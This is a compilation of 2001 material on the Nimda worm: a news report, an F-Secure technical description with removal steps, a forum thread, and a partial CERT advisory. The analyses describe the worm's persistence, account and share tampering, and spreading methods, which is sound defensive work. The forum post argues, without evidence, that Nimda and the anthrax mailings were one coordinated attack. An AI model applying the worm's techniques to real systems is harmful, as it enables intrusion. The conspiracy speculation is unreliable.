|
"No evidence" of terrorist link " Zdat so?
"Nimda" worm strikes Net, e-mail
Published: September 18, 2001, 5:20 PM
PDT
update A
computer worm that spreads to both servers and PCs running Microsoft software flooded the Internet with data Tuesday, prompting
the FBI to create a task force to investigate the attack, sources said.
 Known as "Nimda" or "readme.exe," the worm spreads by sending infected e-mail messages, copying itself
to computers on the same network, and compromising Web servers using Microsoft's Internet Information Server (IIS) software.
"It is extraordinary how much traffic this thing has created in a
couple of hours," said Graham Cluley, senior security consultant for antivirus company Sophos. "As far as we can see, it doesn't seem to be using any psychological tricks because it's all automated."
Mailing lists for the security community quickly generated news of the worm, as infected servers scanned
the Internet for vulnerable servers.
Sources in the antivirus community told CNET News.com that the FBI has set up a "task force" to study
the virus. The FBI held conference calls three times Tuesday night with antivirus experts to discuss the investigation, sources
said.
"There was a task force set up today, and there were a lot of things discussed," said Vincent Gullotto,
director of antivirus research at security software firm Network Associates.
"No evidence" of terrorist link
An FBI representative said the agency was "assessing" the
incident, but so far it found no relationship between the online deluge and last week's terrorist attacks on the World Trade
Center and the Pentagon.
"There has been no indication that this is linked (to Tuesday's) attack," said FBI spokeswoman Debbie
Weierman. "That is the question of the day."
At a news conference Tuesday about last week's terrorist attacks, Attorney General John Ashcroft also
spoke about the Internet worm. "This could be heavier than the July activity with Code Red," he said.
He noted that there is "no evidence" linking the worm, which he said may have first appeared on Monday,
"to the terrorist attacks of last week."
 The worm was noticed by several Silicon Valley companies.
"It does appear to be more aggressive than Code Red," said spokeswoman Pamela Sklar of network equipment
maker 3Com. She added that the company's IT department received more hits per hour from Nimda than it did from Code Red, but
that there was no direct effect on e-mail or Internet access.
The worm's name sparked speculation about its origin. Nimda, for example, is the backward spelling
of admin, the common shorthand for the system administrator. While the worm has text indicating that it may have originated
in China, that is in no way hard evidence, experts said.
Others pointed out that NIMDA is the name of an Israeli defense contractor.
The worm apparently generates an avalanche of Internet traffic because of its multipronged attack on
both servers and PCs.
The server component of the virus exploits an old and previously patched flaw in IIS called the Unicode
Directory Traversal vulnerability.
Once a server is infected, the worm continues to scan for other vulnerable computers. In addition,
the program takes control of the part of Microsoft's IIS software that delivers Web pages,  allowing the virus to trump a request for any page--even invalid requests--and instead return a page infected with the virus.
In addition to its ability to cross between servers and PCs, the Nimda worm seems to be more virulent
because it automatically executes in Microsoft's Outlook e-mail software under the program's "low" security setting.
"There appears to be a MIME exploit," said Eric Chien, chief researcher for antivirus software maker Symantec's European operations.
"It appears that it is doing some kind of exploitation in e-mail."
Nimda also appears to be capable of spreading by other means, including Internet relay chat (IRC), an online chat format, and by FTP for remotely exchanging files.
"My guess is we may also see it spread through Internet relay chat," said Alex Shipp, senior antivirus
technologist at e-mail screening firm MessageLabs.
And that may not be the end of it. "We have also found an FTP component in there," Shipp said. "It
may be trying to download nasty stuff from some Web site somewhere--we're still not sure. We know it is using FTP, but we
don't know how yet."
MessageLabs
said it stopped more than a hundred copies of the virus attached to e-mail messages within an hour of the first incident,
which arrived from Korea at 12:10 p.m. GMT.
Most of the Nimda copies captured by MessageLabs originated from the United States, leading the company
to speculate that was where the virus originated.
While thousands of people likely became aware of the worm when their in-boxes were flooded with e-mail,
for some the damage was more severe.
Mel Lower of Davenport, Iowa, who hosts Web sites for small businesses through EarthLink, said two
of his customers' sites were inaccessible for much of Tuesday.
Lower said he contacted EarthLink and was told that the worm "crippled" two Unix server farms. EarthLink
could not immediately be reached for comment.
When Nimda arrives in an e-mail, it appears as an attachment named readme.exe. This is the same name
used by another current virus called W32/Apost-A, so antivirus companies say many people should already be wary of attachments
bearing that name.
However, analysis of the worm is ongoing, experts said.
"First of all, we are talking guesses at this time," said Fred Cohen from the University of New Haven
in Connecticut. "Clearly, (it) just showed up this morning."
For some time Tuesday morning, the worm's double whammy had experts believing that two pieces of code
were spreading at the same time.
The Computer Emergency Response Team
Staff writer Matt Loney contributed from London.
|
F-Secure Virus Descriptions : Nimda
|
|
|
INFORMATION ON NIMDA
This worm was found on September 18th, 2001. It quickly spread around
the world.
Also see http://www.F-Secure.com/news/2001/news_2001091900.shtml
F-Secure Anti-Virus detects the worm with updates released on
September 18th, 2001 19:20 EET. Disinfection was added in the updates from September 19th, 2001 17:12 EET.
http://www.europe.f-secure.com/download-purchase/updates.shtml
For removal instructions, see the bottom of the page.
GENERAL INFORMATION
Nimda is a complex virus with a mass mailing worm component which
spreads itself in attachments named README.EXE. If affects Windows 95, Windows 98, Windows Me, Windows NT 4 and Windows 2000
users.
Nimda is the first worm to modify existing web sites to start
offering infected files for download. Also it is the first worm to use normal end user machines to scan for vulnerable web
sites. This technique enables Nimda to easily reach intranet web sites located behind firewalls - something worms such as
Code Red couldn't directly do.
Nimda uses the Unicode exploit to infect IIS web servers. This
hole can be closed with a Microsoft patch, downloadable from: http://www.microsoft.com/technet/security/bulletin/ms00-078.asp
The MIME exploit used by the worm can be fixed with this patch:
http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
LIFECYCLE
The actual lifecycle of Nimda can be split to four parts: 1)
Infecting files, 2) Mass mailing, 3) Web worm and 4) LAN propagation.
1) File infection
Nimda locates EXE files from the local machine and infects them
by putting the file inside its body as a resource, thus 'assimilating' that file.These files then spread the infection when
people exchange programs such as games.
2) Mass mailer
Nimda locates e-mail addresses via MAPI from your e-mail client
as well as searching local HTML files for additional addresses. Then it sends one e-mail to each address. These mails contain
an attachment called README.EXE, which might be executed automatically on some systems.
3) Web worm
Nimda starts to scan the internet, trying to locate www servers.
Once a web server is found, the worm tries to infect it by using several known security holes. If this succeeds, the worm
will modify random web pages on the site. End result of this modification is that web surfers browsing the site will get automatically
infected by the worm.
4) LAN propagation
The worm will search for file shares in the local network, either
from file servers or from end user machines. Once found, it will drop a hidden file called RICHED20.DLL to any directory which
has DOC and EML files. When other users try to open DOC or EML files from these directories, Word, Wordpad or Outlook will
execute RICHED20.DLL causing an infection of the PC. The worm will also infect remote files if it was started on a server.
TECHNICAL DETAILS
First it should be noted that the worm behaves differently when
started from files with different file names and with different command lines.
Starting on a server:
If the name of worm's file is ADMIN.DLL, the worm creates a mutex
with 'fsdhqherwqi2001' name, copies itself as MMC.EXE into \Windows\ directory and starts this file with '-qusery9bnow' command
line. Usually the worm is started as ADMIN.DLL on infected webservers. In this case the worm starts to scan and infect files
on all available drives including removable and network ones. The EXE files (except WINZIP32.EXE) on these drives will get
infected with the worm. The infection technique the worm uses is new - the worm puts an infected file inside its body as a
resource. When the infected file is run, the worm extracts the embedded original EXE file, runs it and tries to delete it
afterwards. If instant deletion is not possible, the worm creates WININIT.INI file that will delete the extracted file on
next Windows startup.
The worm also accesses [SOFTWARE\Microsoft\Windows\CurrentVersion\App
Paths] key reads subkeys from there and infects all files listed in the subkeys. The worm doesn't infect WinZip32.exe file.
Also the worm reads user's personal folders from [Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders] key and
infects files in these folders as well.
Then the worm starts to search local hard drives for *.HTML,
.ASP, and .HTM files and if such files are found, the worm creates README.EML file (which is the multi-partite message with
MIME-encoded worm) in the same directory and adds a small JavaScript code to the end of found files. That JavaScript code
would open README.EML file when the infected HTML file is loaded by a web browser. As a result the MIME-encoded worm will
get activated because of a security hole and a system will get infected.
The worm's file runs from a minimized window when downloaded
from an infected webserver. This technique affects users who are browsing the web with Internet Explorer 5.0 or 5.01.
The worm will also put *.EML and *.NWS files in almost all folders
of computers it accesses. The RICHED20.DLL file with hidden and system attribute will be put in all folders where DOC or EML
files are located. The worm will also try to replace Windows' original RICHED20.DLL file with its own copy.
Starting on a workstation:
If the worm is started from README.EXE file (or a file that has
more than 5 symbols in its name and EXE extension), it copies itself to temporary folder with a random name that has 'MEP*.TMP'
name and runs itself there with '-dontrunold' command line option.
When started, the worm loads itself as a DLL library, looks for
a specific resource there and checks its size. If the resource size is less than 100, the worm unloads itself, otherwise it
extracts its resource to a file and launches it. Checking the resource size is done to be able to detect if a worm runs from
infected EXE files.
Then the worm gets current time and generates a random number.
After performing a few arithmetic operations with this number the worm checks the result. If a result is bigger than worm's
counter, the worm starts to search and delete README*.EXE files from temporary folder.
After that the worm prepares its MIME-encoded copy by extrating
a pre-defined multi-partite MIME message from its body and appending its MIME-encoded copy to it. The file with a random name
is created in a temporary folder.
The worm then looks for EXPLORER process, opens it and assigns
its process as remote thread of Explorer. On some platforms the worm fails to run as Explorer's thread. The worm gets API
creates a mutex with 'fsdhqherwqi2001' name, startups Winsock services, gets an infected computer (host) info and sleeps for
some time. When resumed, the worm checks what platform it is running. If it is running on NT-based system, it compacts its
memory blocks to occupy less space in memory and copies itself as LOAD.EXE to Windows system directory. Then it modifies SYSTEM.INI
file by adding the following string after SHELL= variable in [Boot] section:
explorer.exe load.exe -dontrunold
This will start the worm's copy every time Windows starts. The
worm also copies itself as RICHED20.DLL file to system folder and sets hidden and system attributes to this file as well as
to LOAD.EXE file. Then the worm enumerates shared network resources and starts to recursively scan files on remote systems.
When searching for files on remote systems the worm looks for
.DOC and .EML files and then copies its binary image with RICHED20.DLL name to the folders where DOC and EML files are located.
The copied DLL file has system and hidden attributes. This is done to increase the chances of worm activation on remote systems
as Windows' original RICHED20.DLL component is used to open OLE files. But instead the worm's RICHED20.DLL file from current
directory will be launched.
Also when the worm browsing the remote computers' directories
it creates .EML and .NWS (rarely) files that have the names of document or webpage files that the worm could find on a remote
system. These .EML and .NWS files are worm's multi-partite messages with a worm MIME-encoded in them. When scanning the worm
can also delete the .EML and .NWS files it previously created.
The worm doesn't try to infect local or remote EXE files when
started from a workstation.
E-Mail spreading:
The worm searches trough all the '.htm' and '.html' file in the
Temporary Internet Files folder for e-mail addresses. It reads trough user's inbox and collects the sender addresses. When
the address list is ready it uses it's own SMTP engine to send the infected messages.
IIS spreading:
The worm uses backdoors on IIS servers such as the one CodeRed
II installs. It scans random IP addresses for these backdoors. When a host is found to have one the worm instructs the machine
to download the worm code (Admin.dll) from the host used for scanning. After this it executes the worm on the target machine
this way infecting it.
Affecting the security:
The worm adjusts the properties of Windows Explorer, it accesses
[Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced] key and adjusts 'Hidden', 'ShowSuperHidden' and 'HideFileExt'
keys. This affects Windows' (especially ME and 2000) ability to show hidden files - worm's files will not be seen in Explorer
any more.
After that the worm adds a 'guest' account to infected system
account list, activates this account, adds it to 'Administrator' and 'Guests' groups and shares C:\ drive with full access
priviledges. The worm also deletes all subkeys from [SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security] key to
disable sharing security.
Additional information:
The worm has a copyright text string that is never displayed:
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
It should be said that the worm has bugs that cause crashes or
inability to spread itself in certain conditions.
DISINFECTION INSTRUCTIONS
F-Secure Anti-Virus with the latest updates can detect and disinfect
Nimda infections. But full disinfection of the worm will require some additional manual actions.
The F-NIMDA tool was developed to automate these actions. If
you wish to do them by hand, follow the instructions below. Otherwise, download F-NIMDA from
ftp://ftp.f-secure.com/anti-virus/tools/fsnimda3.exe
If you're running Windows ME, you need to turn off the Autorestore
functionality before starting any disinfection. Do this by clicking My Computer on desktop, then Performance->File System
->Troubleshooting->Disable System Restore. Turn it back on when done.
To disinfect the worm and restore security of affected workstations,
please follow these instructions:
1. Disable all network sharing or temporarily kill the network.
This is a _must_ as the worm uses the network to spread itself.
2. Scan _all_ files (not just files with selected extensions)
on all local hard drives and clean all infected EXE files using F-Secure Anti-Virus and the latest updates. It is recommended
that you use one of the latest FSAV versions to remove infection.
3. Delete or rename (if not possible to delete instantly) all
non-disinfectable or locked files including worm droppers (typically 57kB in size):
MMC.EXE (in Windows directory)
LOAD.EXE (in Windows' system directory)
ADMIN.DLL (in root folder of all local hard drives)
RICHED20.DLL (in all folders on all local hard drives)
All *.EML and *.NWS files (typically 79kB in size) that are
detected as infected with Nimda should be deleted. Note that
you might have clean EML files as well, for example if you've
saved e-mails to file from Outlook Express, so only delete
files that FSAV detects as infected.
If an infected file is locked by Windows, complete disinfection,
exit to pure DOS or boot your system with a clean system diskette and rename/delete the file manually. In case of NT/2000
based system the locked file(s) should be renamed with a non-executable extension to ensure that it doesn't start when Windows
is booted next time.
4. Restart a system. Do not connect it to the network yet. It
is advised to scan all files on all local drives with FSAV again to ensure that there are no more infected files in a system.
5. Locate SYSTEM.INI file in your Windows directory and open
it with Wordpad or Notepad. Replace the string "shell=explorer.exe load.exe -donotloadold" with "shell=explorer.exe" string.
6. Delete all files with .TMP extensions from your local temporary
directories - typically \Temp\ or \Windows\Temp\ or \documents and settings\username\local settings\temp.
7. Copy a clean RICHED20.DLL file to \Windows\System\ or \WinNT\System32\
folders. This DLL file is used by many applications and they won't run if this DLL is missing. You can locate a clean RICHED20.DLL
file from a clean Windows machine, or extract it from Office 2000 CD with this command: EXTRACT /A r:\office1.cab riched20.dll /L c:\windows\system
8. Remove all shares from all local hard drives and renew these
shares with correct access rights if needed. This needs to be done because the worm affects shares security. Check especially
the \\localhost\c$ share rights.
9. Remove 'Guest' account and renew it with correct access rights
and group placement ('Guest' account should not be in 'Administrators' group).
10. Check all *.HTML, *.ASP, and *.HTM as well as files that
have 'DEFAULT', 'INDEX', 'MAIN' and 'README' words in their filenames for the small JavaScript code referring to README.EML
file and remove it or restore the affected files from a backup. This JavaScript code is located in the very end of affected
files.
11. When cleaning a webserver from Nimda, the CodeRed II backdoor
infections should be removed as well. Please refer to 'CodeRed' description and cleaning instructions.
http://www.europe.f-secure.com/v-descs/bady.shtml
12. Correct Windows Explorer's settings concerning displaying
of hidden files and certain extensions if necessary as the worm makes Explorer to hide certain files and extensions.
13. Restore network connections only after all workstations are
disinfected or the worm will re-infected already clean computers!
ABOUT INFECTED WEB SITES
A web site can get infected in two ways:
1) Infected htmls are copied the secure site. This can happen
even if you're using a patched version of IIS or something else entirely (such as Apache or Netscape). If there are infected
computers in your organization, their local html files get infected. Users might then later copy or upload such infected pages
to your www server. Alternatively, if your www files are accessible via file sharing the worm might infect them directly from
a workstation. To clean your site, locate all html pages which refer to "README.EML" and remove the extra Javascript code
from the end of the pages.
2) Direct web worm infection. If your web site is running an
unsafe version of IIS, the worm can infect your site by accessing it through http. After this it will restart spreading from
your server. In this case, it is not enough to just clean the virus - your web server is unsafe and has been so for a while.
It's likely there have been previous illegimate accesses to your site as well and it should be considered compromised. We
recommend rebuilding the web server and applying latest patches before restoring clean copies of the html pages.
Remember, F-Secure Management Server 4.x uses IIS as a web server
platform. Keep them patched. F-Secure Policy Manager Server 5.0 and higher do NOT use IIS.
IMPORTANT NOTE
Around 15:00 GMT on 11th of October, 2001, hundreds of e-mails
infected with Nimda.A was sent to various addresses around the world. These e-mails looked like they were sent by "mikko.hypponen@datafellows.com"
(do note that F-Secure used to be called datafellows.com; company name and domain was changed in early 2000). Mr. Mikko Hypponen
is our Manager of Anti-Virus Research. He naturally had nothing to do with this incident. These e-mails were apparently sent
from an infected machine located somewhere in Canada.
F-SECURE ANTI-VIRUS
F-Secure Anti-Virus detects the worm with updates released on
September 18th, 2001 19:20 EET. Disinfection was added in the updates from September 19th, 2001 17:12 EET.
http://www.europe.f-secure.com/download-purchase/updates.shtml
[Analysis: K. Tocheva, G. Erdelyi, A. Podrezov, S. Rautiainen and M.
Hypponen; F-Secure Corp.; September 18-19th, 2001]
| |
Skip to comments.
Possible break in the anthrax case? (Actual title: Anthrax-Nimda Connection)
Dept. of Computer Science and Software Engineering, Seattle University ^ | November 9, 2001 | M. Spector
Posted on 11/13/2001 12:42:52 PM PST by Mitchell
ANTHRAX-NIMDA CONNECTION
Two Prongs of One Attack on Our Communication SystemM. Spector
Dept. of Computer Science and Software Engineering
Seattle
University
E-mail: spector@seattleu.edu
November 9, 2001It appears likely that the recent anthrax mailings and the Nimda computer
worm are two prongs of a single coordinated attack on our communications infrastructure. If this theory is correct, there
may be two undiscovered anthrax-laden letters, including one mailed in late October whose victims would still be in the incubation
period.
A Summary of the EvidenceThe anthrax mailings and the Nimda worm were released on exactly the same two
dates. Moreover, they were distributed via essentially the same method, and they shared a common apparent purpose.
The details follow.
Released on the Same Dates
The anthrax-laden letters were postmarked on Sept. 18 and Oct. 9, 2001. These are
precisely the same dates that the destructive Nimda worm and a new variant of this worm called Nimda.B were released on the
Internet. Sept. 18 was the date that the Nimda worm was released on the Internet, and Oct. 9 was the date that the Nimda.B
variant was released.
Same Method
Both involve mailing (either by the Postal Service or by e-mail) a destructive payload to unsuspecting
individuals. Although the two attacks (anthrax and Nimda) appear at first glance to be very different from one another, a
similar mind-set seems to underlie both.
Same Apparent Purpose
Both attacks may have had as their combined purpose the simultaneous disruption of all
our mail communications -- both the U.S. mail and e-mail. Luckily, neither attack has been particularly successful in this
regard, at least so far.
In addition, the anthrax letters were sent to people in the mass media, which is another
component of our communications system.
Consequences
Still-Undiscovered Anthrax Mailings? (Kathy Nguyen's Death and Another Possible Forthcoming Attack)
Three more
variants of the Nimda worm were released after Nimda.B: Nimda.C (on October 12), and Nimda.D and Nimda.E (both on October
29). If the anthrax-Nimda connection isn't a coincidence, there may have been further mailings of anthrax on October 12 and
October 29.
Are there undiscovered anthrax letters that were mailed on the later worm release dates of October 12
and October 29? Is it conceivable that a hypothetical October 12 mailing was responsible for Kathy Nguyen's death? I think
anybody infected by a hypothetical October 29 mailing would still be in the incubation period for the disease, with signs
of infection to show up shortly.
I hope I'm wrong about the possibility of an Oct. 29 anthrax mailing, but it's important
to be alert for more anthrax cases as we near the end of what would be the incubation period (and this is also a test of whether
the theory is correct).
Notice that these hypothetical anthrax release dates are consistent with the warnings of terrorist
attacks within the following few days issued by the FBI on Oct. 11 and by Attorney General John Ashcroft on Oct. 31 (especially
in light of both the incubation period for anthrax and the inherent uncertainty in warnings such as these).
Connection with Code Red II and earlier worms
The Nimda worm makes use of "back-doors" left by the earlier Code
Red II and sadmind worms. It is unknown if this is an opportunistic use of these back-doors, or if one or both of these earlier
worms were released with the specific intent of following up with the Nimda worm. It is also unknown if Code Red II is actually
related to the original Code Red worm (in spite of the names assigned by security experts). In any event, the sadmind worm
was released on May 8, 2001, Code Red was released on July 16, 2001, and Code Red II was released on August 4, 2001. It would
be of interest to see if there were any apparently unrelated anthrax threats, terrorist threats, etc., on May 8, July 16,
and/or August 4. (I have seen a news report indicating that Bill O'Reilly and Sean Hannity of Fox News may have received letters
before Sept. 11 apparently similar to the later anthrax mailings.)
The People Behind the Attack
The coincidence of dates and the similarity of methods and purpose indicate that
the same group of people is behind both the anthrax attacks and the Nimda series of worms. It appears that at least two people
must be involved, since one person is unlikely to be so skilled at both microbiology and software development as to have been
able to create and carry out both attacks.
Speculation
Speculation - Connections with the 9/11 attacks
The first Nimda attack occurred almost precisely one week (to
the hour, and maybe to the minute) after the first plane hit the World Trade Center, strongly suggesting a connection between
the Sept. 11 attacks and Nimda, and now therefore suggesting a connection between the Sept. 11 attacks and the anthrax mailings.
Speculation - Place of Origin
This theory may point to a foreign connection with the anthrax attack. It has been
widely suggested that Nimda may have originated in China; this is purely speculative and is based only on early widespread
propagation in Asia and on the fact the worm itself contains a reference to China.
Background: Technical Information on the Nimda Worm (and others)For technical information on the Nimda, Code
Red, Code Red II, and sadmind worms, see the Symantec security web site at http://securityresponse.symantec.com , the F-Secure web site at http://www.europe.f-secure.com/v-descs/w.shtml (click on W32/Nimda.a@mm, etc.), and the SANS Institute web site at http://www.incidents.org .
TOPICS: Breaking News; News/Current EventsKEYWORDS: ANTHRAXSCARELIST; TECHINDEX
1 posted on 11/13/2001 12:42:52 PM PST by Mitchell
To: Mitchell
I only skimmed, but this is pretty fascinating. I'll be interested to see other comments.
2 posted on 11/13/2001 12:48:37 PM PST by NYS_Eric
To: Mitchell; *tech_index; *Anthrax_Scare_List
Very interesting !
To find all articles tagged or indexed using above index words
Go here:
OFFICIAL BUMP(TOPIC)LIST
and then click the topic to initiate the search! !
To: Mitchell; *tech_index
Filing at tech_index
To: Mitchell
Bumpin' to check later.
Initial impression - it seems rather far-fetched, but, then again, that's an impressive set of 'coincidences'.
5 posted on 11/13/2001 12:57:55 PM PST by Le-Roy
To: Mitchell
Now THIS is getting really far fetched ....
Sorry, but the "evidence" is not only weak, it is outright MISSING! try again...
6 posted on 11/13/2001 1:00:37 PM PST by AgThorn
To: Mitchell
Speculation - Connections with the 9/11 attacks.
Ahhh.... He admits this is speculation.
To: AgThorn
>Sorry, but the "evidence" is not only weak, it is outright MISSING! try again...
"Evidence?"
If the sequence of events as speculated about turns out to be true, what kind of evidence would be available?!
Would you dismiss a connection as unreal until an FBI agent just happens to walk into a two bedroom apartment
where, in one bedroom, a guy is mixing up anthrax and in the other a guy is typing up computer code?
I mean, this is 2001. People doing this kind of terrorism aren't idiots. This weird, constant talk of "evidence" has an
air of insanity to it.
More likely than not, there will NEVER be evidence that will stand up in a court of law EXPLAINING everything nice and
tidy. But so what? Law enforcement or intelligent agencies still have to respond sooner rather than later to this kind of
large scale threats. They have to act on something other than "court room evidence." And if we're going to understand what's
going on around us, we have to recognize that although "evidence" is great and although it's dangerous to speculate
without hard, material evidence, there are many situations where people just have to get creative, people have to trust
their judgement, and people have to deal with conclusions based on them being persuasively true rather than true beyond
a shadow of a doubt.
Reality is not a court room. It's just not. There is a kind of insanity in trying to deny all of reality that doesn't meet
those utterly artificial standards.
Mark W.
8 posted on 11/13/2001 1:46:38 PM PST by MarkWar
To: MarkWar
What is the connection? the same date? that's it? That's pretty weak.
9 posted on 11/13/2001 1:54:37 PM PST by AgThorn
To: AgThorn
Two identical dates, plus similarity of method and purpose. How much more evidence could there be at
this stage? It merits further investigation.
By the way, the CDC now thinks there is an undiscovered letter, mailed before Oct. 24. This could be the hypothesized Oct. 12 letter in the article. http://www.freerepublic.com/focus/fr/570240/posts
10 posted on 11/13/2001 2:01:19 PM PST by Mitchell
To: AgThorn
Sorry, but the "evidence" is not only weak, it is outright MISSING
This guy is so far out of his tree that it's pitiful. You see this phenomenon every time something happens on the malware
front: a zillion wannabes popping up with one theory more bizarre than the next. Simply put, he's wrong. And if he had bothered
to contact any of the people who knows about this stuff, he would know that he was wrong. That would probably not have deterred
him from trying for some spotlight, though.
The author of Nimda is out there giving interviews and shouting for fame. Much like this dweeb.
11 posted on 11/13/2001 2:07:32 PM PST by Cachelot
To: Mitchell; AgThorn
Sorry for the extra URL at the end (a copy-and-paste error). It's the same as the CDC link at the beginning
of that paragraph.
12 posted on 11/13/2001 2:11:11 PM PST by Mitchell
To: Cachelot
The author of Nimda is out there giving interviews and shouting for fame.
Interviews? Can you give a source for this? I've seen nothing on it.
13 posted on 11/13/2001 2:12:58 PM PST by Mitchell
To: Mitchell
Two identical dates, plus similarity of method and purpose. How much more evidence could there be at this stage?
It merits further investigation. similarity of method, i.e. meaning they are both "mail" (snail and
"e") ... Yes, and ???? Does that mean that anyone that ever drove a truck has something in common with anyone else that drove
a truck? especially if they did it on the same day? ... these "connections" are weaker than weak!!
Purpose?-That's redundant to "method" ... i.e. if your purpose is to get information channels blocked, you would
in effect use the information channel to do the blocking. No, this is a great model for conspiracy chasers only.
Date- I have already stated that the ONLY thing going here is the similarity of dates ... but what is that? nothing.
SANTA and SATAN have the same letters, just rearranged ... heck that's got as much "conspiracy" grounding in it as this
does.
14 posted on 11/13/2001 3:17:46 PM PST by AgThorn
To: AgThorn
SANTA and SATAN have the same letters, just rearranged...
This explains some of Christmas presents
I've gotten lately....
To: self_evident
I can relate!! ;-)
16 posted on 11/13/2001 5:29:22 PM PST by AgThorn
To: AgThorn
Silly speculation is fodder for mockery --except for the speculation that turns out to be true.
Who would have thought that there were Japanese spying all over numerous countries in the late 30's and early 40's, collaborating
with Nazi's to boot --including a certain chap who lived for awhile in Pearl Harbor and liked to watch the ships move in and
out of port?
17 posted on 11/13/2001 10:35:38 PM PST by unspun
To: unspun
Silly speculation is fodder for mockery --except for the speculation that turns out to be true. You
got a point there. Santa could after all be Satan, and remember, you read it here first!
18 posted on 11/13/2001 10:39:05 PM PST by AgThorn
To: AgThorn
Well, I'm not interested in getting into an argument over this. I find the coincidences intriguing, you don't;
that's OK.
Unlike the run-of-the-mill conspiracy theory, this ones has testable conclusions; it's falsifiable. If it's correct, there
ought to have been anthrax mailings postmarked very close to Oct. 12 and Oct. 29. (Even if such mailings turn up, I would
agree that that's not definitive proof. If no such mailings turn up, however, that would be a strong argument against the
theory.)
By the way, the similarity of method is much more than the fact that both used mail. Both involve using mail to send unrelated
destructive payloads to unsuspecting people. (This may still not be enough to satisfy your standards for a connection, but
it is more of a connection than your characterization suggests.)
Also, the similarity of purpose isn't the same as that of method. People have suggested lots of other possible rationales
behind the anthrax attack (a warning from Iraq, for instance, or bin Laden aiming at the media to elicit maximum hysteria
as he tries to goad us into an attack on all of the Muslim world, or possibly a test of how a biological agent would spread
in the mail, or other possibilities). If this connection is true, it suggests a particular specific purpose, namely trying
to disrupt or even shut down our mail and other communication systems.
Anyway, since the theory has testable conclusions, I thought it would be of interest to get it out there now, rather than
after any further mailings are discovered (since at that time, people might say that the theory was tailored to fit the facts).
Time will tell if it is true or false.
19 posted on 11/16/2001 1:06:33 PM PST by Mitchell
To: Mitchell
Time will tell if it is true or false.
I conceed that for certain. I still see stronger "ties" to Afghanistan/Iraq possible collusion in this than to any Nimda
connection. Then again, who's to say that Nimda doesn't have Middle-east ties as well.
There is just too little even circumstantial evidence to make any other correlation at this time. Although we can always
speculate ...
20 posted on 11/16/2001 1:07:08 PM PST by AgThorn
Comment #21 Removed by Moderator
To: AgThorn
I still see stronger "ties" to Afghanistan/Iraq possible collusion in this than to any Nimda connection.
Then again, who's to say that Nimda doesn't have Middle-east ties as well.
I agree completely. I'll be quite surprised if the anthrax mailings turn out to be unconnected to the 9/11 attacks and
probably Iraq.
22 posted on 11/16/2001 1:07:24 PM PST by Mitchell
To: bologna.com
You knew Eceshe in high school as well?
And she told ME I was the only one!!!
23 posted on 11/16/2001 1:09:57 PM PST by AgThorn
To: Mitchell
I agree completely. I'll be quite surprised if the anthrax mailings turn out to be unconnected to the 9/11
attacks and probably Iraq. Careful with the quick agreement ... someone will be sizing ME up for a tinfoil
hat soon!! ;-)
24 posted on 11/16/2001 1:10:37 PM PST by AgThorn
Comment #25 Removed by Moderator
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily
represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the
exemption for fair use of copyrighted works.
FreeRepublic.com is powered by software copyright 2000-2003 Robinson-DeFehr
Consulting, LLC.
Original release date: September 18, 2001 Revised: September 25, 2001 Source: CERT/CC
A complete revision history is at the end of this file.
Systems Affected
- Systems running Microsoft Windows 95, 98, ME, NT, and 2000
OverviewThe CERT/CC has received reports of new malicious code known as the "W32/Nimda worm" or the "Concept Virus
(CV) v.5." This new worm appears to spread by multiple mechanisms:
- from client to client via email
- from client to client via open network shares
- from web server to client via browsing of compromised web sites
- from client to web server via active scanning for and exploitation of various Microsoft IIS 4.0 / 5.0 directory traversal
vulnerabilities (VU#111677
and CA-2001-12)
from client to web server via scanning for the back doors left behind by the "Code Red II" (IN-2001-09), and "sadmind/IIS" (CA-2001-11) worms
The worm modifies web documents (e.g., .htm, .html, and .asp files) and certain executable files found on the systems it
infects, and creates numerous copies of itself under various file names.
We have also received reports of denial of service as a result of network scanning and email propagation.
I. Description
The Nimda worm has the potential to affect both user workstations (clients) running Windows 95, 98, ME, NT, or 2000 and
servers running Windows NT and 2000.
Email PropagationThis worm propagates through email arriving as a MIME "multipart/alternative" message consisting
of two sections. The first section is defined as MIME type "text/html", but it contains no text, so the email appears to have
no content. The second section is defined as MIME type "audio/x-wav", but it contains a base64-encoded attachment named "readme.exe",
which is a binary executable.
Due to a vulnerability described in CA-2001-06 (Automatic Execution of Embedded MIME Types), any mail software running on an x86 platform that uses Microsoft Internet Explorer
5.5 SP1 or earlier (except IE 5.01 SP2) to render the HTML mail automatically runs the enclosed attachment and, as result,
infects the machine with the worm. Thus, in vulnerable configurations, the worm payload will automatically be triggered by
simply opening (or previewing) this mail message. As an executable binary, the payload can also be triggered by simply running
the attachment.
The email message delivering the Nimda worm appears to also have the following characteristics:
- The text in the subject line of the mail message appears to be variable.
- There appear to be many slight variations in the attached binary file, causing the MD5 checksum to be different when one
compares different attachments from different email messages. However, the file length of the attachment appears to consistently
be 57344 bytes.
The worm also contains code that will attempt to resend the infected email messages every 10 days.
Payload
The email addresses targeted for receiving the worm are harvested from two sources
- the .htm and .html files in the user's web cache folder
- the contents of the user's email messages retrieved via the MAPI service
These files are passed through a simple pattern matcher which collects strings that look like email addresses. These addresses
then receive a copy of the worm as a MIME-encoded email attachment. Nimda stores the time the last batch of emails were sent
in the Windows registry, and every 10 days will repeat the process of harvesting addresses and sending the worm via email.
Likewise, the client machines begin scanning for vulnerable IIS servers. Nimda looks for backdoors left by previous IIS
worms: Code Red II [IN-2001-09] and sadmind/IIS worm [CA-2001-11]. It also attempts to exploit various IIS Directory Traversal vulnerabilities (VU#111677 and CA-2001-12). The selection of potential target IP addresses follows these rough probabilities:
- 50% of the time, an address with the same first two octets will be chosen
- 25% of the time, an address with the same first octet will be chosen
- 25% of the time, a random address will be chosen
The infected client machine attempts to transfer a copy of
the Nimda code via tftp (69/UDP) to any IIS server that it scans and finds to be vulnerable.
Once running on the server machine, the worm traverses each directory in the system (including all those accessible through
file shares) and writes a MIME-encoded copy of itself to disk using file names with .eml or .nws extensions (e.g., readme.eml).
When a directory containing web content (e.g., HTML or ASP files) is found, the following snippet of Javascript code is appended
to every one of these web-related files:
This modification of web content allows further propagation of the worm to new clients through a web browser or through
the browsing of a network file system.
In order to further expose the machine, the worm
- enables the sharing of the c: drive as C$
- creates a "Guest" account on Windows NT and 2000 systems
- adds this account to the "Administrator" group.
